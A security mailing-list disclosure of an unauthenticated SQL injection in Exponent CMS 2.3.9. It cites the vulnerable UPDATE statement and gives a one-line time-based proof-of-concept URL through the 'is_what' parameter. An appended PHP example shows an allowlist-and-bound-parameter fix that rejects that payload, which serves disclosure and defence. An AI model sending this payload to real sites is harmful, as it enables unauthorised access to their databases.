Date: Mon, 19 Sep 2016 13:46:34 +0800
From: east wu <ylgaaaaa@...il.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: Exponent CMS 2.3.9 SQL injection vulnerabilities

https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/addressbook/controllers/addressController.php#L172

'is_what' parameter there is an injection without login

https://github.com/exponentcms/exponent-cms/blob/master/framework/core/subsystems/expDatabase.php#L559

$this->sql("UPDATE " . $this->prefix . $table . " SET " . $col . "=0 WHERE " . $where);

POC:
/index.php?controller=address&action=activate_address&is_what=address1=(select * from (select sleep(5))x)%23&id=1
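Added example, not part of the original post and not Exponent CMS code: the statement quoted above concatenates $col into the UPDATE, and a column name cannot be bound as a parameter, so the identifier has to be checked against a fixed allowlist while the row filter is bound. The helper name clearFlagColumn, the column names, the user_id filter and the exp_addresses table are assumptions made for illustration.

```php
<?php
// Hypothetical hardened counterpart of the quoted UPDATE (not project code).

// Assumed flag columns; in a real fix this list comes from the schema.
const FLAG_COLUMNS = ['is_default', 'is_billing', 'is_shipping'];

function clearFlagColumn(PDO $db, string $prefix, string $table,
                         string $col, int $userId): int
{
    // Identifiers cannot be bound, so only exact allowlisted names pass.
    if (!in_array($col, FLAG_COLUMNS, true)) {
        throw new InvalidArgumentException('unexpected flag column');
    }
    // $prefix and $table are supplied by code, never by the request.
    $stmt = $db->prepare(
        "UPDATE {$prefix}{$table} SET {$col} = 0 WHERE user_id = :uid"
    );
    $stmt->execute([':uid' => $userId]);   // the filter value is bound
    return $stmt->rowCount();
}

// Constructed in-memory table so the script runs offline (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE exp_addresses (id INTEGER PRIMARY KEY,
           user_id INT, is_default INT, is_billing INT, is_shipping INT)');
$db->exec('INSERT INTO exp_addresses VALUES (1, 7, 1, 0, 0), (2, 8, 1, 0, 0)');

// Expected column name: only user 7's row is updated.
$changed = clearFlagColumn($db, 'exp_', 'addresses', 'is_default', 7);
echo "rows updated: {$changed}", PHP_EOL;
print_r($db->query('SELECT id, is_default FROM exp_addresses')
           ->fetchAll(PDO::FETCH_KEY_PAIR));

// The is_what value from the post is refused before any SQL is built.
try {
    clearFlagColumn($db, 'exp_', 'addresses',
        'address1=(select * from (select sleep(5))x)#', 7);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```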